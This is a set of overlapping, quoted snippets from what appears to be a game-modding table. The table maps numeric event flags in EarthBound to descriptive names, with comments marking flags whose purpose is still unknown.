"'BRICK_ROAD_DUNGEON_DUCK_2_DEFEATED', 418: 'BRICK_ROAD_DUNGEON_PROTOPLASM_1_DEFEATED', 419: 'BRICK_ROAD_DUNGEON_PROTOPLASM_2_DEFEATED', 420: 'BRICK_ROAD_DUNGEON_MOUSE_1_DEFEATED', 421: 'BRICK_ROAD_DUNGEON_MOUSE_2_DEFEATED', 422: 'ONETT_DAYTIME', 423: 'UNDERWORLD_TALKING_ROCK_STOPPED_TALKING',", "182: 'GOT_MELODY_GIANT_STEP', 183: 'GOT_MELODY_LILLIPUT_STEPS', 184: 'GOT_MELODY_RAINY_CIRCLE', 185: 'GOT_MELODY_MILKY_WELL', 186: 'GOT_MELODY_MAGNET_HILL', 187: 'GOT_MELODY_PINK_CLOUD', 188:", "(???) # 381 (???) 382: 'KIDNAPPED_MR_SATURN_AT_CAVE_OF_THE_PRESENT', 383: 'JUST_RESTED', 384: 'GOT_ALL_MELODIES', 385: 'GOT_CONTACT_LENS', 386:", "'HIDE_TWOSON_HOSPITAL_TOWN_MAP', 569: 'HIDE_TWOSON_TO_THREED_TOWN_MAP', 570: 'HIDE_THREED_DRUGSTORE_TOWN_MAP', 571: 'HIDE_THREED_HOTEL_TOWN_MAP', # 572 (???) 573: 'HIDE_THREED_BAKERY_TOWN_MAP', 574:", "641: 'HIDE_THREED_TO_DESERT_TOWN_MAP', 642: 'HIDE_THREED_TO_TWOSON_TOWN_MAP', 643: 'READY_TO_LOOK_AT_PHOTO_ALBUM', 644: 'GOT_SATURN_RIBBON', 645: 'ESCARGO_EXPRESS_PICK_UP', 646: 'FOR_SALE_SIGN_CUSTOMER_2', 647:", "this flag and never fights you 392: 'GUARDIAN_HIEROGLYPH_3_DEFEATED', 393: 'GUARDIAN_HIEROGLYPH_4_DEFEATED', 394: 'GUARDIAN_HIEROGLYPH_5_DEFEATED', 395:", "'CAPTAIN_STRONG_AT_STATION_ENTRANCE', 450: 'CAPTAIN_STRONG_NOT_AT_STATION_DESK', 451: 'MONKEY_CAVE_SKIP_SANDWICH', 452: 'MONKEY_CAVE_PICNIC_LUNCH', 453: 'MONKEY_CAVE_WET_TOWEL', 454: 'MONKEY_CAVE_PIZZA_1', 455: 'MONKEY_CAVE_PROTEIN_DRINK',", "# 373 (Unknown. Related to Boogey Tent) 374: 'TOPOLLA_THEATER_BACKSTAGE_UNBLOCKED', 375: 'PEOPLE_IN_ONETT', # 376", "189: 'GOT_MELODY_FIRE_SPRING', 190: 'CONQUERED_SANCTUARY_1', 191: 'CONQUERED_SANCTUARY_2', 192: 'CONQUERED_SANCTUARY_4', 193: 'CONQUERED_SANCTUARY_3', 194: 'CONQUERED_SANCTUARY_5', 195:", "Hotel Attendant?) 590: 'HAPPY_THREED_PEOPLE', 591: 'CHARRED_MONKEY_OUTSIDE_JACKIES_CAFE', # TODO: CONFIRM 592: 'MONKEY_OUTSIDE_JACKIES_CAFE', # TODO:", "'HH_HQ_CULTIST_5_DEFEATED', 356: 'HH_HQ_CULTIST_6_DEFEATED', 357: 'SENTRY_ROBOT_1_DEFEATED', 358: 'SENTRY_ROBOT_2_DEFEATED', 359: 'SENTRY_ROBOT_3_DEFEATED', 360: 'SENTRY_ROBOT_4_DEFEATED', 361: 'SENTRY_ROBOT_5_DEFEATED',", "color palette) 288: 'USED_HAWK_EYE', 289: 'ONETT_COP_1_DEFEATED', 290: 'ONETT_COP_2_DEFEATED', 291: 'ONETT_COP_3_DEFEATED', 292: 'ONETT_COP_4_DEFEATED', 293:", "if you don't talk to Apple Kid 127: 'TALKED_TO_ANDONUTS_1', 128: 'JEFF_STARTS_HIS_JOURNEY', 129: 'TESSIE_EMERGES',", "250: 'SHOP_SATURN_CONSUMABLES', 251: 'SHOP_DESERT_DRUGSTORE_EQUIPMENT', 252: 'SHOP_DESERT_DRUGSTORE_CONSUMABLES', 253: 'SHOP_DESERT_MINE', 254: 'SHOP_DESERT_ARMS_DEALER', 255: 'SHOP_FOURSIDE_BAKERY', 256:", "'STARMAN_DX_DEFEATED', 71: 'MASTER_BELCH_DEFEATED', 72: 'MINE_MOLES_DEFEATED', 73: 'GIYGAS_DEFEATED', 74: 'NESS_NIGHTMARE_DEFEATED', 75: 'MANI_MANI_DEFEATED', 76: 'GOT_TRACY_COOKIE',", "'PRESENT_TONY_COOKIE_1', 830: 'PRESENT_TONY_COOKIE_2', 831: 'PRESENT_TONY_COOKIE_3', 832: 'PRESENT_TONY_COOKIE_4', 833: 'PRESENT_TONY_COOKIE_5', 834: 'PRESENT_TONY_COOKIE_6', 835: 'PRESENT_TONY_COOKIE_7'", "moles defeated? How does this differ from 72?) # 283 (???) 284: 'PEACEFUL_REST_PENCIL_ERASED',", "239: 'SHOP_HH_DRUGSTORE_CONSUMABLES', 240: 'SHOP_HH_DRUGSTORE_EQUIPMENT', 241: 'SHOP_THREED_DRUGSTORE_EQUIPMENT', 242: 'SHOP_THREED_DRUGSTORE_CONSUMABLES', 243: 'SHOP_THREED_ARMS_DEALER', 244: 'SHOP_THREED_BAKERY', 245:", "# 320 (???) # 321 (Something about Paula's Dad acknowledging the kidnapping) 322:", "'GOT_SATURN_LIFENOODLES', 172: 'GOT_SATURN_COIN', 173: 'GOT_SATURN_STAG_BEETLE', 174: 'DESERT_MINE_EXPANDED', # 175 (Unknown. Set when you", "659: 'MOONSIDE_SWITCH_YES_NO', 660: 'ALT_NO_TALK_TEXT', 661: 'CHOSEN_FOUR_SOULS_RETURNING_MUSIC', 662: 'DUNGEON_MAN_DESERT_MUSIC', 663: 'RETURNED_SHYNESS_BOOK', 664: 'TREMBLING_MONOTOLI_AT_48TH_FLOOR_ABSENT', 665:", "WHAT?) 805: 'PRESENT_CRACKED_BAT', 829: 'PRESENT_TONY_COOKIE_1', 830: 'PRESENT_TONY_COOKIE_2', 831: 'PRESENT_TONY_COOKIE_3', 832: 'PRESENT_TONY_COOKIE_4', 833: 'PRESENT_TONY_COOKIE_5',", "28: 'FLYING_MAN_4_JOINS', 29: 'FLYING_MAN_5_JOINS', 30: 'POKEY_JOINS', 31: 'LIER_INSIDE_HOUSE', 32: 'LIER_INSIDE_CAVE_1', 33: 'LIER_INSIDE_CAVE_2', 34:", "'GOT_PHOTO_SATURN_VALLEY_FINAL', 730: 'TALKED_TO_ONETT_BAKERY_LADY_TWICE', 731: 'SHOP_UNDERWORLD_TENDA', 732: 'SHOP_MAGICANT', 733: 'SHOP_MOONSIDE', 734: 'ONETT_HOSPITAL_PATIENT_OWNER_JOKE', 735: 'TALKED_TO_SMASH_WOUND_GIRLS_MOTHER',", "'FOR_SALE_SIGN_CUSTOMER_1', # 447 (???) # 448 (???) 449: 'CAPTAIN_STRONG_AT_STATION_ENTRANCE', 450: 'CAPTAIN_STRONG_NOT_AT_STATION_DESK', 451: 'MONKEY_CAVE_SKIP_SANDWICH',", "643: 'READY_TO_LOOK_AT_PHOTO_ALBUM', 644: 'GOT_SATURN_RIBBON', 645: 'ESCARGO_EXPRESS_PICK_UP', 646: 'FOR_SALE_SIGN_CUSTOMER_2', 647: 'FOR_SALE_SIGN_CUSTOMER_3', 648: 'FOR_SALE_SIGN_CUSTOMER_4', 649:", "359: 'SENTRY_ROBOT_3_DEFEATED', 360: 'SENTRY_ROBOT_4_DEFEATED', 361: 'SENTRY_ROBOT_5_DEFEATED', 362: 'SENTRY_ROBOT_6_DEFEATED', 363: 'SHARK_OUTSIDE_ARCADE_1_DEFEATED', 364: 'SHARK_OUTSIDE_ARCADE_2_DEFEATED', 365:", "flags) # 230 (I hate multipurpose flags) # 231 (I hate multipurpose flags)", "'CALLED_STOIC_CLUB', 338: 'NEAR_WINTERS_ROPE', 339: 'APPLE_KID_NOT_AT_HIS_HOUSE', # 340 (???) 341: 'RECEIVED_APPLE_KID_CALL_ABOUT_PENCIL_ERASER', 342: 'PYRAMID_OPEN', 343:", "464: 'GOT_KING_BANANA', # 465 (???) 466: 'PICKY_SLEEPING_AT_METEORITE', # 467 (Unknown. Related to Ness's", "327: 'PHASE_DISTORTER_V3_AT_CAVE_OF_THE_PRESENT', 328: 'ANDONUTS_AT_CAVE_OF_THE_PRESENT_1', 329: 'APPLE_KID_AT_CAVE_OF_THE_PRESENT', 330: 'MR_SATURN_AT_CAVE_OF_THE_PRESENT', 331: 'ANDONUTS_AT_CAVE_OF_THE_PRESENT_2', 332: 'PHASE_DISTORTER_V2_AT_CAVE_OF_THE_PRESENT', 333:", "'TEMP_9', 10: 'TEMP_10', 11: 'ENEMY_SUPPRESS', 12: 'PAULAS_PARENTS_KNOW_ABOUT_HH_RESCUE', 13: 'PAULA_JOINS', 14: 'JEFF_JOINS', 15: 'MONSTERS_IN_WINTERS',", "Poo's journey) 151: 'QUEST_TO_SUBMARINE', 152: 'PYRAMID_DANCE_IN_PROGRESS', 153: 'TENDA_VILLAGE_UNDERGROUND_OPEN', 154: 'TALKED_TO_TENDA_CHIEF', 155: 'TENDAS_NOT_SHY', #", "735: 'TALKED_TO_SMASH_WOUND_GIRLS_MOTHER', 736: 'GOT_PAIR_OF_DIRTY_SOCKS', 737: 'TALKED_TO_TWOSON_HOTEL_GUY_AT_TABLE_NINE_TIMES', 738: 'GOT_MONEY_FROM_TWOSON_HOTEL_GUY_AT_TABLE', 739: 'PAULAS_DAD_RAN_IN_FRONT_OF_TWOSON_HOTEL', 740: 'PEOPLE_IN_THREED_ABSENT', 741:", "262: 'SHOP_FOURSIDE_DEPT_CONDIMENTS', 263: 'SHOP_FOURSIDE_DEPT_ARMS_DEALER', 264: 'SHOP_FOURSIDE_PUNK_GUY', 265: 'SHOP_SUMMERS_SHOP', 266: 'SHOP_SUMMERS_RESTAURANT', 267: 'SHOP_TOTO_SHOP', 268:", "to Ness's house door knocking?) 468: 'POKEYS_HOUSE_LOCKED', 469: 'POLICE_AT_METEORITE', 470: 'TALKED_TO_TRACY_AT_HER_ROOM', 471: 'TALKED_TO_MOM',", "'HIDE_SUMMERS_HOTEL_TOWN_MAP', 583: 'HIDE_SUMMERS_RESTAURANT_TOWN_MAP', 584: 'HIDE_SUMMERS_SHOP_TOWN_MAP', 585: 'HIDE_SUMMERS_HOSPITAL_TOWN_MAP', 586: 'HIDE_TOTO_SHOP_TOWN_MAP', 587: 'FLYING_MAN_MUSIC', # 588", "'LAST_MELODY_AT_FIRE_SPRING', 549: 'QUEUE_OUTSIDE_CHAOS_THEATER', 550: 'GOT_SUPORMA', 551: 'GAVE_FOOD_TO_APPLE_KID', 552: 'GOT_ZOMBIE_PAPER', 553: 'GOT_BACKSTAGE_PASS', 554: 'GOT_YOGURT_DISPENSER',", "44: 'POKEY_OUTSIDE_HH_HQ', 45: 'POKEY_OUTSIDE_PAULA_CABIN', 46: 'ZOMBIE_CHICK_OUTSIDE_HOTEL', 47: 'BROKEN_SKYRUNNER_THREED', 48: 'FIXED_SKYRUNNER_THREED', 49: 'BOOGEY_TENT_IN_THREED', 50:", "'GOT_ERASER_ERASER', # 619 (Unkonwn. Related to Stonehenge Base) 620: 'APPLE_MOUSE_AT_WINTERS_LAB', 621: 'MONKEYS_AT_WINTERS_LAB', 622:", "'PEOPLE_IN_THREED_ABSENT', 741: 'MONOTOLI_AT_48TH_FLOOR', 742: 'LARDNA_AT_HOME', 743: 'VISITED_HAPPY_HAPPY_VILLAGE', 744: 'TALKED_TO_CARPAINTER', 745: 'QUEST_TO_YOGURT_MACHINE', 746: 'SCAM_HOUSE_UNLOCKED',", "# 313 (Unknown. Something about the City Bus?) # 314 (Unknown. Something about", "'ALT_BUY_SOUND_EFFECT', 657: 'BOUGHT_OR_SOLD_AT_SHOP', 658: 'BOUGHT_WEAPON', 659: 'MOONSIDE_SWITCH_YES_NO', 660: 'ALT_NO_TALK_TEXT', 661: 'CHOSEN_FOUR_SOULS_RETURNING_MUSIC', 662: 'DUNGEON_MAN_DESERT_MUSIC',", "340 (???) 341: 'RECEIVED_APPLE_KID_CALL_ABOUT_PENCIL_ERASER', 342: 'PYRAMID_OPEN', 343: 'GOT_HIEROGLYPH_COPY', 344: 'LAKE_TESS_WIND_BLOWING', # 345 (Related", "fights you 392: 'GUARDIAN_HIEROGLYPH_3_DEFEATED', 393: 'GUARDIAN_HIEROGLYPH_4_DEFEATED', 394: 'GUARDIAN_HIEROGLYPH_5_DEFEATED', 395: 'GUARDIAN_HIEROGLYPH_6_DEFEATED', 396: 'GUARDIAN_HIEROGLYPH_7_DEFEATED', 397:", "368: 'SLIMY_LITTLE_PILE_3_DEFEATED', 369: 'CAN_ENTER_BELCHS_FACTORY', # 370 (Unknown. Related to traffic jam?) # 371", "61: 'MAGIC_CAKE_LADY_IDENTIFIED', 62: 'DUNGEON_MAN_IN_DESERT', 63: 'PATH_TO_MANI_MANI_OPEN', 64: 'FRANKYSTEIN_MKII_DEFEATED', # 65 (???) 66: 'EVERDRED_DEFEATED',", "(I hate multipurpose flags) # 232 (I hate multipurpose flags) # 233 (I", "(Related to PREVENT_TELEPORT?) # 780 (If set, Maxwell doesn't actually save your game.", "# 540 (???) 541: 'OPENED_THREED_CEMETERY_UNDREGROUND_DOOR', 542: 'SAILING_OR_SUBMARINE_MUSIC', 543: 'SAILING_POST_KRAKEN_MUSIC', 544: 'WINTERS_MUSIC', 545: 'LAST_MELODY_AT_LILLIPUT_STEPS',", "378 (???) 379: 'ANDONUTS_AT_LAB_ABSENT', # 380 (???) # 381 (???) 382: 'KIDNAPPED_MR_SATURN_AT_CAVE_OF_THE_PRESENT', 383:", "'MONKEY_CAVE_PIZZA_1', 455: 'MONKEY_CAVE_PROTEIN_DRINK', 456: 'MONKEY_CAVE_PIZZA_2', 457: 'MONKEY_CAVE_HAMBURGER_1', 458: 'MONKEY_CAVE_HAMBURGER_2', 459: 'MONKEY_CAVE_KING_BANANA', 460: 'MONKEY_CAVE_HAMBURGER_3',", "talking to Paula's dad and not talking to Everdred) 612: 'EVERDRED_NOT_AT_ROOF', 613: 'TELEPORT_MONKEY_NOT_AT_CAVE',", "627: 'TRACY_HAS_SOUND_STONE', 628: 'PRESENTS_AT_SATURN_VALLEY', 629: 'PARTY_IS_DIRTY_FROM_BELCH_FIGHT', 630: 'BUBBLE_MONKEY_AT_LAKE_TESS', 631: 'TALKED_TO_MOONSIDE_MONOTOLI', 632: 'MONSTERS_IN_ONETT', 633:", "692: 'ESCARGO_EXPRESS_HAS_PAULAS_PENCIL_ERASER', 693: 'ESCARGO_EXPRESS_HAS_POOS_HAWK_EYE', 694: 'ESCARGO_EXPRESS_PENCIL_ERASER_DELIVERY', 695: 'ESCARGO_EXPRESS_HAWK_EYE_DELIVERY', 696: 'RANDOM_JEFF_ITEM_FIX_CHANCE', 697: 'SHARK_AT_ARCADE_UPSTAIRS_DEFEATED', 698:", "# 780 (If set, Maxwell doesn't actually save your game. WHAT?) 805: 'PRESENT_CRACKED_BAT',", "599: 'SHOP_SOUTH_SCARABA_VARIETY', 600: 'SHOP_DEEP_DARKNESS_BUSINESSMAN', 601: 'SHATTERED_MAN_1_DEFEATED', 602: 'SHATTERED_MAN_2_DEFEATED', 603: 'MINI_BARF_DEFEATED', 604: 'GOT_KEY_TO_THE_LOCKER', 605:", "(Something about Lake Tess color palette) 288: 'USED_HAWK_EYE', 289: 'ONETT_COP_1_DEFEATED', 290: 'ONETT_COP_2_DEFEATED', 291:", "451: 'MONKEY_CAVE_SKIP_SANDWICH', 452: 'MONKEY_CAVE_PICNIC_LUNCH', 453: 'MONKEY_CAVE_WET_TOWEL', 454: 'MONKEY_CAVE_PIZZA_1', 455: 'MONKEY_CAVE_PROTEIN_DRINK', 456: 'MONKEY_CAVE_PIZZA_2', 457:", "'PHOTO_SUMMERS_BEACH_AVAILABLE', 504: 'PHOTO_TOTO_AVAILABLE', 505: 'PHOTO_SCARABA_BAZAAR_AVAILABLE', 506: 'PHOTO_PYRAMID_AVAILABLE', 507: 'PHOTO_SCARABA_OASIS_AVAILABLE', 508: 'PHOTO_DEEP_DARKNESS_AVAILABLE', 509: 'PHOTO_TENDA_VILLAGE_AVAILABLE',", "to Tracy after defeating Giygas, but never set) 770: 'LAST_ESCARGO_EXPRESS_CALL', # 771 (???)", "96: 'POKEY_WAITING_MOM_GOODBYE', 97: 'NESS_HOUSE_POKEY_MUSIC', 98: 'ANSWERED_DADS_CALL', 99: 'BOUGHT_SCAM_HOUSE', 100: 'KING_WONT_JOIN', 101: 'LEARNED_THAT_LIER_SOLD_THE_MANI_MANI', 102:", "123: 'BLUE_COW_ALT_TEXT', 124: 'ZOMBIE_PAPER_ON_TENT', 125: 'ZOMBIES_ON_TENT_FLOOR', 126: 'LEARNED_ABOUT_SHYNESS_BOOK', # TODO: Maybe \"can search", "72: 'MINE_MOLES_DEFEATED', 73: 'GIYGAS_DEFEATED', 74: 'NESS_NIGHTMARE_DEFEATED', 75: 'MANI_MANI_DEFEATED', 76: 'GOT_TRACY_COOKIE', 77: 'GOT_MR_BASEBALL_CAP', 78:", "51: 'SHYNESS_BOOK_AT_LIBRARY', 52: 'CAPTIVES_AT_STONEHENGE', 53: 'TALKED_TO_BRICK_ROAD', # 54 (Montague at beginning of expanded", "'FOR_SALE_SIGN_CUSTOMER_2', 647: 'FOR_SALE_SIGN_CUSTOMER_3', 648: 'FOR_SALE_SIGN_CUSTOMER_4', 649: 'TALKED_TO_ROCK_BELOW_TENDA_VILALGE', 650: 'GOT_MONKEYS_LOVE', 651: 'UNDERWORLD_TENDA_GATE_OPEN', 652: 'USED_CARROT_KEY',", "'JEFF_JOINS', 15: 'MONSTERS_IN_WINTERS', 16: 'POO_JOINS', 17: 'POO_LEARNING_STARSTORM', 18: 'BUZZ_BUZZ_IN_PARTY', 19: 'SLEEPING_KING_ABSENT', 20: 'PICKY_IN_PARTY',", "294: 'APPLE_MOUSE_BLOCKING_DOOR', 295: 'NESS_HOUSE_DOOR_KNOCKING', 296: 'ZOMBIE_CHICK_AT_HOTEL_1', # First hotel room 297: 'ZOMBIE_CHICK_AT_HOTEL_2', #", "'GOT_LETTER_FROM_MOM', 666: 'GOT_LETTER_FROM_TONY', 667: 'GOT_LETTER_FROM_KIDS', 668: 'TALKED_TO_MONTAGUE_AT_SATURN_VALLEY_BEFORE_MAGICANT', 669: 'FLY_HONEY_TRASH_CAN_VISIBLE', 670: 'GOT_FOR_SALE_SIGN', # 671", "78: 'GOT_ENTERTAINERS_TRAVEL_CHARM', 79: 'GOT_METEORITE_PIECE', 80: 'GOT_KEY_TO_SHACK', 81: 'HAS_BICYCLE', 82: 'GOT_RECEIVER_PHONE', 83: 'GOT_PENCIL_ERASER', 84:", "153: 'TENDA_VILLAGE_UNDERGROUND_OPEN', 154: 'TALKED_TO_TENDA_CHIEF', 155: 'TENDAS_NOT_SHY', # 156 (???) # 157 (???) #", "# TODO: CONFIRM 593: 'POO_TELEPORTING_TO_SUMMERS', 594: 'BLOND_GUY_IN_FOURSIDE', # TODO: CONFIRM 595: 'STAR_MASTER_NEXT_TO_MU', #", "might be responsible only for palette changes, maybe) 435: 'GUARDIAN_GENERAL_DEFEATED', 436: 'SEA_OF_EDEN_KRAKEN_1_DEFEATED', 437:", "'PHOTO_STONEHENGE_AVAILABLE', 501: 'PHOTO_SUMMERS_HOTEL_AVAILABLE', 502: 'PHOTO_FOURSIDE_RESTAURANT_AVAILABLE', 503: 'PHOTO_SUMMERS_BEACH_AVAILABLE', 504: 'PHOTO_TOTO_AVAILABLE', 505: 'PHOTO_SCARABA_BAZAAR_AVAILABLE', 506: 'PHOTO_PYRAMID_AVAILABLE',", "game. WHAT?) 805: 'PRESENT_CRACKED_BAT', 829: 'PRESENT_TONY_COOKIE_1', 830: 'PRESENT_TONY_COOKIE_2', 831: 'PRESENT_TONY_COOKIE_3', 832: 'PRESENT_TONY_COOKIE_4', 833:", "42: 'APPLE_KID_IN_BURGLIN_PARK', 43: 'RUNAWAY_FIVE_FAN_GIRL_OUTSIDE_BACKSTAGE', 44: 'POKEY_OUTSIDE_HH_HQ', 45: 'POKEY_OUTSIDE_PAULA_CABIN', 46: 'ZOMBIE_CHICK_OUTSIDE_HOTEL', 47: 'BROKEN_SKYRUNNER_THREED', 48:", "69: 'BOOGEY_TENT_DEFEATED', 70: 'STARMAN_DX_DEFEATED', 71: 'MASTER_BELCH_DEFEATED', 72: 'MINE_MOLES_DEFEATED', 73: 'GIYGAS_DEFEATED', 74: 'NESS_NIGHTMARE_DEFEATED', 75:", "'SHOP_BURGLIN_PARK_JAMAICAN', 236: 'SHOP_BURGLIN_PARK_BAKERY', 237: 'SHOP_BURGLIN_PARK_CONDIMENTS', 238: 'SHOP_BURGLIN_PARK_BANANA_LADY', 239: 'SHOP_HH_DRUGSTORE_CONSUMABLES', 240: 'SHOP_HH_DRUGSTORE_EQUIPMENT', 241: 'SHOP_THREED_DRUGSTORE_EQUIPMENT',", "721: 'GOT_PHOTO_FOURSIDE_RESTAURANT', 722: 'GOT_PHOTO_SUMMERS_BEACH', 723: 'GOT_PHOTO_TOTO', 724: 'GOT_PHOTO_SCARABA_BAZAAR', 725: 'GOT_PHOTO_PYRAMID', 726: 'GOT_PHOTO_SCARABA_OASIS', 727:", "'PHASE_DISTORTER_V2_AT_CAVE_OF_THE_PRESENT', 333: 'DESERT_MINE_BULLDOZER_MOVED', 334: 'BUBBLE_MONKEY_JOINS', 335: 'TONY_AT_BOARDING_SCHOOL_GATE', 336: 'GOT_KEY_TO_DUNGEON_MAN', 337: 'CALLED_STOIC_CLUB', 338: 'NEAR_WINTERS_ROPE',", "'PHOTO_PYRAMID_AVAILABLE', 507: 'PHOTO_SCARABA_OASIS_AVAILABLE', 508: 'PHOTO_DEEP_DARKNESS_AVAILABLE', 509: 'PHOTO_TENDA_VILLAGE_AVAILABLE', 510: 'PHOTO_SATURN_VALLEY_FINAL_AVAILABLE', 511: 'GOT_TOWN_MAP', 512: 'HAS_EXIT_MOUSE',", "257: 'SHOP_FOURSIDE_DEPT_3RD_FLOOR_CONSUMABLES', 258: 'SHOP_FOURSIDE_DEPT_BAKERY', 259: 'SHOP_FOURSIDE_DEPT_4TH_FLOOR_TOYS', 260: 'SHOP_FOURSIDE_DEPT_4TH_FLOOR_SPORTS', 261: 'SHOP_FOURSIDE_DEPT_BURGER', 262: 'SHOP_FOURSIDE_DEPT_CONDIMENTS', 263:", "TODO: Investigate) 476: 'POLICE_BARRIERS_AT_ONETT_HILLTOP', 477: 'NESS_SLEEPING_AT_HIS_BED', 478: 'SHOP_SCARABA_CONDIMENTS', 479: 'PHOTO_NESS_HOUSE_AVAILABLE', 480: 'PHOTO_SCAM_HOUSE_AVAILABLE', 481:", "(Unknown. Something about the City Bus?) 317: 'RUNAWAY_BUS_FROM_FOURSIDE_TO_THREED', 318: 'RUNAWAY_FIVE_AT_CLUMSY_ROBOT_ROOM', 319: 'WATCHED_RUNAWAY_FIVE_AT_CHAOS_THEATER', #", "609: 'WINTERS_PENCIL_ERASED', 610: 'DETECTIVE_IN_THREED', # 611 (Something about talking to Paula's dad and", "677: 'HIDE_THREED_BUS_STOP_2_TOWN_MAP', 678: 'HIDE_FOURSIDE_BUS_STOP_TOWN_MAP', # 679 (Something about Venus show about to start?)", "How does this differ from 72?) # 283 (???) 284: 'PEACEFUL_REST_PENCIL_ERASED', 285: 'TALKED_TO_APPLE_KID_CAVE_OF_THE_PRESENT',", "Carpainter) 176: 'HEALER_SOFTEN', 177: 'HEALER_PURIFY', 178: 'HEALER_RESTORE_FEELING', 179: 'LARGE_PIZZA_DELIVERY', 180: 'PIZZA_DELIVERY', 181: 'ESCARGO_EXPRESS_DELIVERY',", "524: 'YOUR_SANCTUARY_MUSIC', # 525 (???) 526: 'NEAR_BLUE_GEYSER_1', 527: 'NEAR_RED_GEYSER', 528: 'NEAR_BLUE_GEYSER_2', # 529", "# 525 (???) 526: 'NEAR_BLUE_GEYSER_1', 527: 'NEAR_RED_GEYSER', 528: 'NEAR_BLUE_GEYSER_2', # 529 (???) 530:", "457: 'MONKEY_CAVE_HAMBURGER_1', 458: 'MONKEY_CAVE_HAMBURGER_2', 459: 'MONKEY_CAVE_KING_BANANA', 460: 'MONKEY_CAVE_HAMBURGER_3', 461: 'MONKEY_CAVE_FRESH_EGG', 462: 'MONKEY_CAVE_RULER', 463:", "'SHOP_FOURSIDE_PUNK_GUY', 265: 'SHOP_SUMMERS_SHOP', 266: 'SHOP_SUMMERS_RESTAURANT', 267: 'SHOP_TOTO_SHOP', 268: 'SHOP_SUMMERS_GELATO', 269: 'SHOP_MAGIC_CAKE_LADY', 270: 'SHOP_DALAAM_RESTAURANT',", "'LETHAL_ASP_HIEROGLYPH_3_DEFEATED', 410: 'LETHAL_ASP_HIEROGLYPH_4_DEFEATED', 411: 'LETHAL_ASP_HIEROGLYPH_5_DEFEATED', 412: 'LETHAL_ASP_HIEROGLYPH_6_DEFEATED', 413: 'LETHAL_ASP_HIEROGLYPH_7_DEFEATED', 414: 'LETHAL_ASP_HIEROGLYPH_8_DEFEATED', 415: 'LETHAL_ASP_HIEROGLYPH_9_DEFEATED',", "750: 'LEFT_HOME_AT_LEAST_ONCE', 751: 'CHAOS_THEATER_AUDIENCE_ABSENT', 752: 'HINT_GUY_ABSENT', 753: 'NESS_HOUSE_PHONE_RINGING', 754: 'PREVENT_TELEPORT', 755: 'GOT_INSIGNIFICANT_ITEM', 756:", "624: 'EVERDRED_AT_HIS_HOUSE', # 625 (Something about \"Fancy Pokey\" in the Monotoli Building) --", "defeated? How does this differ from 72?) # 283 (???) 284: 'PEACEFUL_REST_PENCIL_ERASED', 285:", "Belch) 762: 'DUNGEON_MAN_GOODBYE_EXIT_SIGN', 763: 'PICKY_KNOCKING_ON_DOOR', 764: 'READY_TO_LEARN_TELEPORT', 765: 'LEARNED_PHASE_DISTORTER_V2_FUNCTIONS', 766: 'EXIT_MOUSE_DISAGREEABLE', 767: 'LEARNED_ABOUT_UNDERWORLD_GEYSERS',", "'PAULA_AT_MONOTOLI_BUILDING', 777: 'GOT_SYNESS_BOOK_BACK_FROM_TENDA', 778: 'EXIT_MOUSE_ASLEEP', # 779 (Related to PREVENT_TELEPORT?) # 780 (If", "'HIDE_THREED_BUS_STOP_2_TOWN_MAP', 678: 'HIDE_FOURSIDE_BUS_STOP_TOWN_MAP', # 679 (Something about Venus show about to start?) #", "237: 'SHOP_BURGLIN_PARK_CONDIMENTS', 238: 'SHOP_BURGLIN_PARK_BANANA_LADY', 239: 'SHOP_HH_DRUGSTORE_CONSUMABLES', 240: 'SHOP_HH_DRUGSTORE_EQUIPMENT', 241: 'SHOP_THREED_DRUGSTORE_EQUIPMENT', 242: 'SHOP_THREED_DRUGSTORE_CONSUMABLES', 243:", "415: 'LETHAL_ASP_HIEROGLYPH_9_DEFEATED', 416: 'BRICK_ROAD_DUNGEON_DUCK_1_DEFEATED', 417: 'BRICK_ROAD_DUNGEON_DUCK_2_DEFEATED', 418: 'BRICK_ROAD_DUNGEON_PROTOPLASM_1_DEFEATED', 419: 'BRICK_ROAD_DUNGEON_PROTOPLASM_2_DEFEATED', 420: 'BRICK_ROAD_DUNGEON_MOUSE_1_DEFEATED', 421:", "224: 'SHOP_SOLD_OLD_EQUIPMENT', 225: 'SHOP_SOLD_ITEM', # 226 (I hate multipurpose flags) # 227 (I", "166: 'MOONSIDE_COUNTDOWN_GUY_1', 167: 'MOONSIDE_COUNTDOWN_GUY_2', 168: 'MOONSIDE_COUNTDOWN_GUY_3', 169: 'PHASE_DISTORTER_V2_BEING_FINISHED', # 170 (???) 171: 'GOT_SATURN_LIFENOODLES',", "flags) # 227 (I hate multipurpose flags) # 228 (I hate multipurpose flags)", "595: 'STAR_MASTER_NEXT_TO_MU', # 596 (???) 597: 'SHOP_SCARABA_BAZAAR_FOOD', 598: 'SHOP_SCARABA_WATER', 599: 'SHOP_SOUTH_SCARABA_VARIETY', 600: 'SHOP_DEEP_DARKNESS_BUSINESSMAN',", "'HIDE_FOURSIDE_BUS_STOP_TOWN_MAP', # 679 (Something about Venus show about to start?) # 680 (Something", "and never fights you 392: 'GUARDIAN_HIEROGLYPH_3_DEFEATED', 393: 'GUARDIAN_HIEROGLYPH_4_DEFEATED', 394: 'GUARDIAN_HIEROGLYPH_5_DEFEATED', 395: 'GUARDIAN_HIEROGLYPH_6_DEFEATED', 396:", "362: 'SENTRY_ROBOT_6_DEFEATED', 363: 'SHARK_OUTSIDE_ARCADE_1_DEFEATED', 364: 'SHARK_OUTSIDE_ARCADE_2_DEFEATED', 365: 'SHARK_AT_ARCADE_ABSENT', 366: 'SLIMY_LITTLE_PILE_1_DEFEATED_AND_THREED_BLOND_GUY_BY_TENT_ABSENT', 367: 'SLIMY_LITTLE_PILE_2_DEFEATED', 368:", "509: 'PHOTO_TENDA_VILLAGE_AVAILABLE', 510: 'PHOTO_SATURN_VALLEY_FINAL_AVAILABLE', 511: 'GOT_TOWN_MAP', 512: 'HAS_EXIT_MOUSE', 513: 'ONETT_POST_METEORITE_MUSIC', 514: 'JUST_RESTED_AT_HOME', 515:", "592: 'MONKEY_OUTSIDE_JACKIES_CAFE', # TODO: CONFIRM 593: 'POO_TELEPORTING_TO_SUMMERS', 594: 'BLOND_GUY_IN_FOURSIDE', # TODO: CONFIRM 595:", "668: 'TALKED_TO_MONTAGUE_AT_SATURN_VALLEY_BEFORE_MAGICANT', 669: 'FLY_HONEY_TRASH_CAN_VISIBLE', 670: 'GOT_FOR_SALE_SIGN', # 671 (???) 672: 'POKEY_FLIES_AWAY_BY_HELICOPTER', 673: 'HIDE_TWOSON_BURGLIN_BAKERY_TOWN_MAP',", "'FLYING_MAN_2_JOINS', 27: 'FLYING_MAN_3_JOINS', 28: 'FLYING_MAN_4_JOINS', 29: 'FLYING_MAN_5_JOINS', 30: 'POKEY_JOINS', 